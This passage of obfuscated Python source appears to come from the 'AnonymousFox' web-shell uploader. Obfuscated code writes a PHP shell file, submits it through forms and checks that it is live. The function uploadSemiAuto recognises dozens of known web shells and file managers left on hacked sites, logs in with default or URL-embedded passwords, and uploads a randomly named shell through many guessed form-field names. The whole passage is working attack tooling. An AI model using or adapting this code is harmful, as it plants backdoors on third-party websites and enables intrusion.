lsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk):
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
else :
return (()==[])
if (sys.version_info[((()==[])+(()==[]))]<((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw)):
with open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))) as f:
f.write( shell_Fox )
else :
with open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))) as f:
f.write( shell_Fox )
f.close()
if (sys.version_info[((()==[])+(()==[]))]<((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw)):
f=open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
else :
f=open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
br.form.add_file(f,str("".join(chr(__RSV) for __RSV in [(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])),__________________________bqruohfppisx)
br.submit()
f.close()
os.remove(__________________________bqruohfppisx)
_______________________________elvnyqkmatgu=shellPath_Fox(________________________czrkpslclact,__________________________bqruohfppisx,(_hlsclcpzwvcu**_hlsclcpzwvcu))
_________________________xopyuxqnuyqk=requests.get(_______________________________elvnyqkmatgu, headers = headers , verify =(()==[]), timeout =((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))))
_________________________xopyuxqnuyqk=content_Fox(_________________________xopyuxqnuyqk)
if (str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk and str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in checkups ):
return _______________________________elvnyqkmatgu
return (()==[])
except :
try :
f.close()
except :
pass
try :
os.remove(__________________________bqruohfppisx)
pass
except :
pass
return (()==[])
def uploadSemiAuto(url, src, req):
try:
filename = random_Fox(10) + '.php'
if ('- FoxWSO v' in src):
filedata = {'a': 'BUbwxgj', 'p1': 'uploadFile', 'ne': '', 'charset': 'UTF-8', 'c': ''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('charset' in src and 'uploadFile' in src and 'FilesMAn' in src and 'Windows' in src) :
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
if('f[]' in src and 'name=f>' not in src):
fileup = {'f[]': (filename, shell_Fox)}
else:
fileup = {'f': (filename, shell_Fox)}
elif ('<pre align=center><form method=post>Password<br><input type=password name=pass' in src and 'style=\'background-color:whitesmoke;border:1px solid #FFF;outline:none' in src and 'type=submit name=\'watching\' value=\'submit\'' in src) :
post = {'pass': 'xleet'}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('Jijle3' in src) :
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
fileup = {'f':(filename,shell_Fox)}
elif ('Hacked By AnonymousFox' in src) :
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('Tryag File Manager' in src) :
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('http://www.ubhteam.org/images/UBHFinal1.png' in src) :
filedata = {'submit': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('<h1>File</h1>' in src) :
filedata = {'':''}
fileup = {'filename': (filename, shell_Fox)}
elif ('#p@@#' in src) :
filedata = {'':''}
fileup = {'filename': (filename, shell_Fox)}
elif ('404-server!!' in src):
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('Vuln!! patch it Now!' in src and '_upl' in src):
filedata = {'_upl': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('<title>Mister Spy</title>' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('B Ge Team File Manager' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('http://i.imgur.com/kkhH5Ig.png' in src):
filedata = {'submit': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('xichang1' in src):
filedata = {'': ''}
fileup = {'userfile': (filename, shell_Fox)}
elif ('vwcleanerplugin' in src):
filedata = {'': ''}
fileup = {'userfile': (filename, shell_Fox)}
elif ('By Gentoo' in src):
pth = re.findall(re.compile('#000000"></td></tr></table><br></fieldset></form><form method="POST" action="(.*)"'), src)[0]
pth2 = re.findall(re.compile('\?http(.*)'), pth)[0]
pth2 = pth2.replace('amp;', '')
filedata = {'B1': 'Kirim'}
fileup = {'userfile': (filename, shell_Fox)}
url = url + '?http' + pth2
elif ('IndoXploit' in src and 'current_dir' in src):
filedata = {'uploadtype': '1', 'upload': 'upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('IndoXploit' in src and 'Current DIR' in src):
filedata = {'upload': 'upload'}
fileup = {'ix_file': (filename, shell_Fox)}
url = url+'?dir=./&do=upload'
elif ('uploader' in src and '_upl' in src):
filedata = {'_upl': 'Upload'}
fileup = {'uploader': (filename, shell_Fox)}
elif ('k2ll33d' in src):
filedata = {'uploadcomp': 'Go', 'path': './'}
fileup = {'file': (filename, shell_Fox)}
url = url+'?y=./&x=upload'
elif ('Tusbol Mantan :' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('Raiz0WorM' in src and 'zb' in src):
fileup = {'zb': (filename, shell_Fox)}
filedata = {'upload': 'upload'}
elif ('MisterSpyv7up' in src and 'uploads' in src):
filedata = {'': ''}
fileup = {'uploads': (filename, shell_Fox)}
elif ('alfa' in src and 'f[]' in src):
filedata = {'a': 'RmlsZXNNQW4', 'c' :'Li8=', 'alfa1' :'dXBsb2FkRmlsZQ==', 'charset' :''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('RC-SHELL' in src and 'merged' in src):
filedata = {'merged': 'YWN0PXVwbG9hZCZkPS4vJnVzdWJtaXQ9MSY=', 'rfile1' :'', 'path1' :'./'}
fileup = {'file1': (filename, shell_Fox)}
elif ('<title>utf</title>' in src and 'newfile' in src):
filedata = {'': ''}
fileup = {'newfile': (filename, shell_Fox)}
elif ('<title>modules</title>' in src and 'filename' in src):
filedata = {'': ''}
fileup = {'filename': (filename, shell_Fox)}
elif ('File Manager - Current disk' in src and 'doupfile' in src):
filedata = {'doupfile': 'Upload', 'uploaddir': './', 'dir' :'./'}
fileup = {'uploadfile': (filename, shell_Fox)}
elif ('#' in url):
password = re.findall(re.compile('#(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
elif ('@' in url):
password = re.findall(re.compile('@(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
elif (';' in url):
password = re.findall(re.compile(';(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
else :
filedata = {'submit': 'Upload', 'Submit':'Upload', 'submit_upload': 'upload', '_upl': 'Upload', 'upload': 'upload', 'v': 'up', 'upl': '1', 'p':'', 'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': '', 'path': './', 'upl_files':'upload', 'fname':''}
if ('name="uploadfiles[]"' in src or "name='uploadfiles[]'" in src or 'name= "uploadfiles[]"' in src or 'name= \'uploadfiles[]\'' in src or 'name = "uploadfiles[]"' in src or 'name = \'uploadfiles[]\'' in src or 'name ="uploadfiles[]"' in src or 'name =\'uploadfiles[]\'' in src or 'name=uploadfiles[]' in src or 'name =uploadfiles[]' in src or 'name= uploadfiles[]' in src or 'name = uploadfiles[]' in src):
fileup = {'uploadfiles[]':(filename, shell_Fox)}
elif ('name="uploadfile[]"' in src or "name='uploadfile[]'" in src or 'name= "uploadfile[]"' in src or 'name= \'uploadfile[]\'' in src or 'name = "uploadfile[]"' in src or 'name = \'uploadfile[]\'' in src or 'name ="uploadfile[]"' in src or 'name =\'uploadfile[]\'' in src or 'name=uploadfile[]' in src or 'name =uploadfile[]' in src or 'name= uploadfile[]' in src or 'name = uploadfile[]' in src):
fileup = {'uploadfile[]':(filename, shell_Fox)}
elif ('name="idx_files[]"' in src or "name='idx_files[]'" in src or 'name= "idx_files[]"' in src or 'name= \'idx_files[]\'' in src or 'name = "idx_files[]"' in src or 'name = \'idx_files[]\'' in src or 'name ="idx_files[]"' in src or 'name =\'idx_files[]\'' in src or 'name=idx_files[]' in src or 'name =idx_files[]' in src or 'name= idx_files[]' in src or 'name = idx_files[]' in src):
fileup = {'idx_files[]':(filename, shell_Fox)}
elif ('name="idx_file[]"' in src or "name='idx_file[]'" in src or 'name= "idx_file[]"' in src or 'name= \'idx_file[]\'' in src or 'name = "idx_file[]"' in src or 'name = \'idx_file[]\'' in src or 'name ="idx_file[]"' in src or 'name =\'idx_file[]\'' in src or 'name=idx_file[]' in src or 'name =idx_file[]' in src or 'name= idx_file[]' in src or 'name = idx_file[]' in src):
fileup = {'idx_file[]':(filename, shell_Fox)}
elif ('name="userfiles[]"' in src or "name='userfiles[]'" in src or 'name= "userfiles[]"' in src or 'name= \'userfiles[]\'' in src or 'name = "userfiles[]"' in src or 'name = \'userfiles[]\'' in src or 'name ="userfiles[]"' in src or 'name =\'userfiles[]\'' in src or 'name=userfiles[]' in src or 'name =userfiles[]' in src or 'name= userfiles[]' in src or 'name = userfiles[]' in src):
fileup = {'userfiles[]':(filename, shell_Fox)}
elif ('name="userfile[]"' in src or "name='userfile[]'" in src or 'name= "userfile[]"' in src or 'name= \'userfile[]\'' in src or 'name = "userfile[]"' in src or 'name = \'userfile[]\'' in src or 'name ="userfile[]"' in src or 'name =\'userfile[]\'' in src or 'name=userfile[]' in src or 'name =userfile[]' in src or 'name= userfile[]' in src or 'name = userfile[]' in src):
fileup = {'userfile[]':(filename, shell_Fox)}
elif ('name="inputfiles[]"' in src or "name='inputfiles[]'" in src or 'name= "inputfiles[]"' in src or 'name= \'inputfiles[]\'' in src or 'name = "inputfiles[]"' in src or 'name = \'inputfiles[]\'' in src or 'name ="inputfiles[]"' in src or 'name =\'inputfiles[]\'' in src or 'name=inputfiles[]' in src or 'name =inputfiles[]' in src or 'name= inputfiles[]' in src or 'name = inputfiles[]' in src):
fileup = {'inputfiles[]':(filename, shell_Fox)}
elif ('name="inputfile[]"' in src or "name='inputfile[]'" in src or 'name= "inputfile[]"' in src or 'name= \'inputfile[]\'' in src or 'name = "inputfile[]"' in src or 'name = \'inputfile[]\'' in src or 'name ="inputfile[]"' in src or 'name =\'inputfile[]\'' in src or 'name=inputfile[]' in src or 'name =inputfile[]' in src or 'name= inputfile[]' in src or 'name = inputfile[]' in src):
fileup = {'inputfile[]':(filename, shell_Fox)}
elif ('name="filenames[]"' in src or "name='filenames[]'" in src or 'name= "filenames[]"' in src or 'name= \'filenames[]\'' in src or 'name = "filenames[]"' in src or 'name = \'filenames[]\'' in src or 'name ="filenames[]"' in src or 'name =\'filenames[]\'' in src or 'name=filenames[]' in src or 'name =filenames[]' in src or 'name= filenames[]' in src or 'name = filenames[]' in src):
fileup = {'filenames[]':(filename, shell_Fox)}
elif ('name="filename[]"' in src or "name='filename[]'" in src or 'name= "filename[]"' in src or 'name= \'filename[]\'' in src or 'name = "filename[]"' in src or 'name = \'filename[]\'' in src or 'name ="filename[]"' in src or 'name =\'filename[]\'' in src or 'name=filename[]' in src or 'name =filename[]' in src or 'name= filename[]' in src or 'name = filename[]' in src):
fileup = {'filename[]':(filename, shell_Fox)}
elif ('name="file_n[]"' in src or "name='file_n[]'" in src or 'name= "file_n[]"' in src or 'name= \'file_n[]\'' in src or 'name = "file_n[]"' in src or 'name = \'file_n[]\'' in src or 'name ="file_n[]"' in src or 'name =\'file_n[]\'' in src or 'name=file_n[]' in src or 'name =file_n[]' in src or 'name= file_n[]' in src or 'name = file_n[]' in src):
fileup = {'file_n[]':(filename, shell_Fox)}
elif ('name="files[]"' in src or "name='files[]'" in src or 'name= "files[]"' in src or 'name= \'files[]\'' in src or 'name = "files[]"' in src or 'name = \'files[]\'' in src or 'name ="files[]"' in src or 'name =\'files[]\'' in src or 'name=files[]' in src or 'name =files[]' in src or 'name= files[]' in src or 'name = files[]' in src):
fileup = {'files[]':(filename, shell_Fox)}
elif ('name="file[]"' in src or "name='file[]'" in src or 'name= "file[]"' in src or 'name= \'file[]\'' in src or 'name = "file[]"' in src or 'name = \'file[]\'' in src or 'name ="file[]"' in src or 'name =\'file[]\'' in src or 'name=file[]' in src or 'name =file[]' in src or 'name= file[]' in src or 'name = file[]' in src):
fileup = {'file[]':(filename, shell_Fox)}
elif ('name="f[]"' in src or "name='f[]'" in src or 'name= "f[]"' in src or 'name= \'f[]\'' in src or 'name = "f[]"' in src or 'name = \'f[]\'' in src or 'name ="f[]"' in src or 'name =\'f[]\'' in src or 'name=f[]' in src or 'name =f[]' in src or 'name= f[]' in src or 'name = f[]' in src):
fileup = {'f[]':(filename, shell_Fox)}
elif ('name="n[]"' in src or "name='n[]'" in src or 'name= "n[]"' in src or 'name= \'n[]\'' in src or 'name = "n[]"' in src or 'name = \'n[]\'' in src or 'name ="n[]"' in src or 'name =\'n[]\'' in src or 'name=n[]' in src or 'name =n[]' in src or 'name= n[]' in src or 'name = n[]' in src):
fileup = {'n[]':(filename, shell_Fox)}
elif ('name="images[]"' in src or "name='images[]'" in src or 'name= "images[]"' in src or 'name= \'images[]\'' in src or 'name = "images[]"' in src or 'name = \'images[]\'' in src or 'name ="images[]"' in src or 'name =\'images[]\'' in src or 'name=images[]' in src or 'name =images[]' in src or 'name= images[]' in src or 'name = images[]' in src):
fileup = {'images[]':(filename, shell_Fox)}
elif ('name="image[]"' in src or "name='image[]'" in src or 'name= "image[]"' in src or 'name= \'image[]\'' in src or 'name = "image[]"' in src or 'name = \'image[]\'' in src or 'name ="image[]"' in src or 'name =\'image[]\'' in src or 'name=image[]' in src or 'name =image[]' in src or 'name= image[]' in src or 'name = image[]' in src):
fileup = {'image[]':(filename, shell_Fox)}
elif ('name="uploader[]"' in src or "name='uploader[]'" in src or 'name= "uploader[]"' in src or 'name= \'uploader[]\'' in src or 'name = "uploader[]"' in src or 'name = \'uploader[]\'' in src or 'name ="uploader[]"' in src or 'name =\'uploader[]\'' in src or 'name=uploader[]' in src or 'name =uploader[]' in src or 'name= uploader[]' in src or 'name = uploader[]' in src):
fileup = {'uploader[]':(filename, shell_Fox)}
elif ('name="uploads[]"' in src or "name='uploads[]'" in src or 'name= "uploads[]"' in src or 'name= \'uploads[]\'' in src or 'name = "uploads[]"' in src or 'name = \'uploads[]\'' in src or 'name ="uploads[]"' in src or 'name =\'uploads[]\'' in src or 'name=uploads[]' in src or 'name =uploads[]' in src or 'name= uploads[]' in src or 'name = uploads[]' in src):
fileup = {'uploads[]':(filename, shell_Fox)}
